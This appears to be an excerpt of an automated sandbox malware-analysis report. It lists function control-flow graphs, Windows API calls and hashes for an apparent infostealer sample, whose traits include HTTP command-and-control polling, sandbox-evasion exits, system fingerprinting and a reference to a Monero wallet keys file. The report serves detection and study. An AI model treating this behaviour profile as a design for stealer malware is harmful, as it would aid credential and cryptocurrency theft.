                              • API String ID: 2238633743-3259397216
                              • Opcode ID: 60198819b0b2acf92e7084fbf76dcbe3f16094c815febcbdc9457ebe4d9c1f5d
                              • Instruction ID: 0aef47b6a437b653d206d4a7d1a850e942a7084c08898c9a44e4cbb9fa389e67
                              • Opcode Fuzzy Hash: 60198819b0b2acf92e7084fbf76dcbe3f16094c815febcbdc9457ebe4d9c1f5d
                              • Instruction Fuzzy Hash: 4F621DB5510200AFC358DFABED8996637F9FF8C20171C853BA609E3274D6399849DBD2
                              Function 00C56280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 c56280-c5630b call c6a7a0 call c547b0 call c6a740 InternetOpenA StrCmpCA 1040 c56314-c56318 1033->1040 1041 c5630d 1033->1041 1042 c5631e-c56342 InternetConnectA 1040->1042 1043 c56509-c56525 call c6a7a0 call c6a800 * 2 1040->1043 1041->1040 1044 c564ff-c56503 InternetCloseHandle 1042->1044 1045 c56348-c5634c 1042->1045 1063 c56528-c5652d 1043->1063 1044->1043 1047 c5634e-c56358 1045->1047 1048 c5635a 1045->1048 1050 c56364-c56392 HttpOpenRequestA 1047->1050 1048->1050 1052 c564f5-c564f9 InternetCloseHandle 1050->1052 1053 c56398-c5639c 1050->1053 1052->1044 1055 c563c5-c56405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 c5639e-c563bf InternetSetOptionA 1053->1056 1058 c56407-c56427 call c6a740 call c6a800 * 2 1055->1058 1059 c5642c-c5644b call c68940 1055->1059 1056->1055 1058->1063 1066 c5644d-c56454 1059->1066 1067 c564c9-c564e9 call c6a740 call c6a800 * 2 1059->1067 1069 c564c7-c564ef InternetCloseHandle 1066->1069 1070 c56456-c56480 InternetReadFile 1066->1070 1067->1063 1069->1052 1074 c56482-c56489 1070->1074 1075 c5648b 1070->1075 1074->1075 1079 c5648d-c564c5 call c6a9b0 call c6a8a0 call c6a800 1074->1079 1075->1069 1079->1070
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C54839
                                • Part of subcall function 00C547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C54849
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • InternetOpenA.WININET(00C70DFE,00000001,00000000,00000000,00000000), ref: 00C562E1
                              • StrCmpCA.SHLWAPI(?,007FE758), ref: 00C56303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C56335
                              • HttpOpenRequestA.WININET(00000000,GET,?,007FE338,00000000,00000000,00400100,00000000), ref: 00C56385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C563BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C563D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C563FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C5646D
                              • InternetCloseHandle.WININET(00000000), ref: 00C564EF
                              • InternetCloseHandle.WININET(00000000), ref: 00C564F9
                              • InternetCloseHandle.WININET(00000000), ref: 00C56503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: bee084ea1a29c6f27e94535269d04305a65eecd0b59a0016f57257d027cc6281
                              • Instruction ID: fbceb480e92fc0b54ada8a0e033394076d21f0f8a3191482b1700b0c307a3d24
                              • Opcode Fuzzy Hash: bee084ea1a29c6f27e94535269d04305a65eecd0b59a0016f57257d027cc6281
                              • Instruction Fuzzy Hash: 61717C75A00208AFDB24DFA0CC89BEE7774AF44701F508169F50A7B190DBB46A89CF91
                              Function 00C65510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 c65510-c65577 call c65ad0 call c6a820 * 3 call c6a740 * 4 1106 c6557c-c65583 1090->1106 1107 c655d7-c6564c call c6a740 * 2 call c51590 call c652c0 call c6a8a0 call c6a800 call c6aad0 StrCmpCA 1106->1107 1108 c65585-c655b6 call c6a820 call c6a7a0 call c51590 call c651f0 1106->1108 1134 c65693-c656a9 call c6aad0 StrCmpCA 1107->1134 1138 c6564e-c6568e call c6a7a0 call c51590 call c651f0 call c6a8a0 call c6a800 1107->1138 1124 c655bb-c655d2 call c6a8a0 call c6a800 1108->1124 1124->1134 1139 c656af-c656b6 1134->1139 1140 c657dc-c65844 call c6a8a0 call c6a820 * 2 call c51670 call c6a800 * 4 call c66560 call c51550 1134->1140 1138->1134 1143 c656bc-c656c3 1139->1143 1144 c657da-c6585f call c6aad0 StrCmpCA 1139->1144 1270 c65ac3-c65ac6 1140->1270 1148 c656c5-c65719 call c6a820 call c6a7a0 call c51590 call c651f0 call c6a8a0 call c6a800 1143->1148 1149 c6571e-c65793 call c6a740 * 2 call c51590 call c652c0 call c6a8a0 call c6a800 call c6aad0 StrCmpCA 1143->1149 1163 c65865-c6586c 1144->1163 1164 c65991-c659f9 call c6a8a0 call c6a820 * 2 call c51670 call c6a800 * 4 call c66560 call c51550 1144->1164 1148->1144 1149->1144 1249 c65795-c657d5 call c6a7a0 call c51590 call c651f0 call c6a8a0 call c6a800 1149->1249 1170 c65872-c65879 1163->1170 1171 c6598f-c65a14 call c6aad0 StrCmpCA 1163->1171 1164->1270 1179 c658d3-c65948 call c6a740 * 2 call c51590 call c652c0 call c6a8a0 call c6a800 call c6aad0 StrCmpCA 1170->1179 1180 c6587b-c658ce call c6a820 call c6a7a0 call c51590 call c651f0 call c6a8a0 call c6a800 1170->1180 1200 c65a16-c65a21 Sleep 1171->1200 1201 c65a28-c65a91 call c6a8a0 call c6a820 * 2 call c51670 call c6a800 * 4 call c66560 call c51550 1171->1201 1179->1171 1275 c6594a-c6598a call c6a7a0 call c51590 call c651f0 call c6a8a0 call c6a800 1179->1275 1180->1171 1200->1106 1201->1270 1249->1144 1275->1171
                              APIs
                                • Part of subcall function 00C6A820: lstrlen.KERNEL32(00C54F05,?,?,00C54F05,00C70DDE), ref: 00C6A82B
                                • Part of subcall function 00C6A820: lstrcpy.KERNEL32(00C70DDE,00000000), ref: 00C6A885
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C65644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C656A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C65857
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C651F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C65228
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C652C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C65318
                                • Part of subcall function 00C652C0: lstrlen.KERNEL32(00000000), ref: 00C6532F
                                • Part of subcall function 00C652C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C65364
                                • Part of subcall function 00C652C0: lstrlen.KERNEL32(00000000), ref: 00C65383
                                • Part of subcall function 00C652C0: lstrlen.KERNEL32(00000000), ref: 00C653AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C6578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C65940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C65A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00C65A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: b3cef7b9441042d6c3a86c5e1b310a1a659a979049ca4e0ee8117b6c872c3eab
                              • Instruction ID: 508223a36f3ef740a7282a444552bd345a7416b1c46b537a20024c5fea23f02c
                              • Opcode Fuzzy Hash: b3cef7b9441042d6c3a86c5e1b310a1a659a979049ca4e0ee8117b6c872c3eab
                              • Instruction Fuzzy Hash: 33E12E71910104AACB24FBA1DCD7AED7378AF58300F548529B50677192EF346B4DEFA2
                              Function 00C617A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 c617a0-c617cd call c6aad0 StrCmpCA 1304 c617d7-c617f1 call c6aad0 1301->1304 1305 c617cf-c617d1 ExitProcess 1301->1305 1309 c617f4-c617f8 1304->1309 1310 c619c2-c619cd call c6a800 1309->1310 1311 c617fe-c61811 1309->1311 1312 c61817-c6181a 1311->1312 1313 c6199e-c619bd 1311->1313 1315 c61821-c61830 call c6a820 1312->1315 1316 c618cf-c618e0 StrCmpCA 1312->1316 1317 c6198f-c61999 call c6a820 1312->1317 1318 c618ad-c618be StrCmpCA 1312->1318 1319 c61849-c61858 call c6a820 1312->1319 1320 c61835-c61844 call c6a820 1312->1320 1321 c61932-c61943 StrCmpCA 1312->1321 1322 c61913-c61924 StrCmpCA 1312->1322 1323 c61970-c61981 StrCmpCA 1312->1323 1324 c618f1-c61902 StrCmpCA 1312->1324 1325 c61951-c61962 StrCmpCA 1312->1325 1326 c6187f-c61890 StrCmpCA 1312->1326 1327 c6185d-c6186e StrCmpCA 1312->1327 1313->1309 1315->1313 1344 c618e2-c618e5 1316->1344 1345 c618ec 1316->1345 1317->1313 1342 c618c0-c618c3 1318->1342 1343 c618ca 1318->1343 1319->1313 1320->1313 1350 c61945-c61948 1321->1350 1351 c6194f 1321->1351 1348 c61926-c61929 1322->1348 1349 c61930 1322->1349 1332 c61983-c61986 1323->1332 1333 c6198d 1323->1333 1346 c61904-c61907 1324->1346 1347 c6190e 1324->1347 1329 c61964-c61967 1325->1329 1330 c6196e 1325->1330 1340 c61892-c6189c 1326->1340 1341 c6189e-c618a1 1326->1341 1338 c61870-c61873 1327->1338 1339 c6187a 1327->1339 1329->1330 1330->1313 1332->1333 1333->1313 1338->1339 1339->1313 1355 c618a8 1340->1355 1341->1355 1342->1343 1343->1313 1344->1345 1345->1313 1346->1347 1347->1313 1348->1349 1349->1313 1350->1351 1351->1313 1355->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00C617C5
                              • ExitProcess.KERNEL32 ref: 00C617D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: fd9018676e35c2bc9c51ecd74a70abe1260a520a718a66d511d986977de47a05
                              • Instruction ID: cbacc06793031d540f294f89c82fd464236420a13443147b4053c9fa9342df03
                              • Opcode Fuzzy Hash: fd9018676e35c2bc9c51ecd74a70abe1260a520a718a66d511d986977de47a05
                              • Instruction Fuzzy Hash: FC51A3B4A04209EFCB24DFA2D998BBE77B5BF44305F1C845AE805B7240D770EA45DB62
                              Function 00C67500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 c67500-c6754a GetWindowsDirectoryA 1357 c67553-c675c7 GetVolumeInformationA call c68d00 * 3 1356->1357 1358 c6754c 1356->1358 1365 c675d8-c675df 1357->1365 1358->1357 1366 c675e1-c675fa call c68d00 1365->1366 1367 c675fc-c67617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 c67628-c67658 wsprintfA call c6a740 1367->1369 1370 c67619-c67626 call c6a740 1367->1370 1377 c6767e-c6768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C67542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C6757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C6760A
                              • wsprintfA.USER32 ref: 00C67640
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 031702d9eb99e78ad93744104928e53b8c19131dfd71ca74b5c5ee4188f09e58
                              • Instruction ID: be3902c7e70b22afd3d20f778164c5693eb99a68268d589f24400db3d84c1b48
                              • Opcode Fuzzy Hash: 031702d9eb99e78ad93744104928e53b8c19131dfd71ca74b5c5ee4188f09e58
                              • Instruction Fuzzy Hash: 7E4182B1D04248AFDB20DF94DC85BEEBBB8EF18704F140599F50977280D778AA48CBA5
                              Function 00C669F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F24B8), ref: 00C698A1
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2410), ref: 00C698BA
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2458), ref: 00C698D2
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2488), ref: 00C698EA
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2500), ref: 00C69903
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F9288), ref: 00C6991B
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007E5C50), ref: 00C69933
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007E5D10), ref: 00C6994C
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2230), ref: 00C69964
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2278), ref: 00C6997C
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2368), ref: 00C69995
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F2398), ref: 00C699AD
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007E5E10), ref: 00C699C5
                                • Part of subcall function 00C69860: GetProcAddress.KERNEL32(74DD0000,007F24A0), ref: 00C699DE
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                                • Part of subcall function 00C511D0: ExitProcess.KERNEL32 ref: 00C51211
                                • Part of subcall function 00C51160: GetSystemInfo.KERNEL32(?), ref: 00C5116A
                                • Part of subcall function 00C51160: ExitProcess.KERNEL32 ref: 00C5117E
                                • Part of subcall function 00C51110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C5112B
                                • Part of subcall function 00C51110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C51132
                                • Part of subcall function 00C51110: ExitProcess.KERNEL32 ref: 00C51143
                                • Part of subcall function 00C51220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C5123E
                                • Part of subcall function 00C51220: __aulldiv.LIBCMT ref: 00C51258
                                • Part of subcall function 00C51220: __aulldiv.LIBCMT ref: 00C51266
                                • Part of subcall function 00C51220: ExitProcess.KERNEL32 ref: 00C51294
                                • Part of subcall function 00C66770: GetUserDefaultLangID.KERNEL32 ref: 00C66774
                                • Part of subcall function 00C51190: ExitProcess.KERNEL32 ref: 00C511C6
                                • Part of subcall function 00C67850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C511B7), ref: 00C67880
                                • Part of subcall function 00C67850: RtlAllocateHeap.NTDLL(00000000), ref: 00C67887
                                • Part of subcall function 00C67850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C6789F
                                • Part of subcall function 00C678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67910
                                • Part of subcall function 00C678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C67917
                                • Part of subcall function 00C678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C6792F
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007F9208,?,00C7110C,?,00000000,?,00C71110,?,00000000,00C70AEF), ref: 00C66ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C66AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00C66AF9
                              • Sleep.KERNEL32(00001770), ref: 00C66B04
                              • CloseHandle.KERNEL32(?,00000000,?,007F9208,?,00C7110C,?,00000000,?,00C71110,?,00000000,00C70AEF), ref: 00C66B1A
                              • ExitProcess.KERNEL32 ref: 00C66B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: b7dc13c4c299c9c1ae7cbd7363e38b0ad1a2a785c6719ef0765fbff22429ecbd
                              • Instruction ID: 994b1c694f3123c9a4c47277f160fe0593e78c8a7942d4c4aff0c83963012bcb
                              • Opcode Fuzzy Hash: b7dc13c4c299c9c1ae7cbd7363e38b0ad1a2a785c6719ef0765fbff22429ecbd
                              • Instruction Fuzzy Hash: E0314370910208ABDB24FBF1DC97BEE7778AF04300F144529F512B61C2DF705945EAA6
                              Function 00C51220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 c51220-c51247 call c689b0 GlobalMemoryStatusEx 1439 c51273-c5127a 1436->1439 1440 c51249-c51271 call c6da00 * 2 1436->1440 1441 c51281-c51285 1439->1441 1440->1441 1443 c51287 1441->1443 1444 c5129a-c5129d 1441->1444 1446 c51292-c51294 ExitProcess 1443->1446 1447 c51289-c51290 1443->1447 1447->1444 1447->1446
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C5123E
                              • __aulldiv.LIBCMT ref: 00C51258
                              • __aulldiv.LIBCMT ref: 00C51266
                              • ExitProcess.KERNEL32 ref: 00C51294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
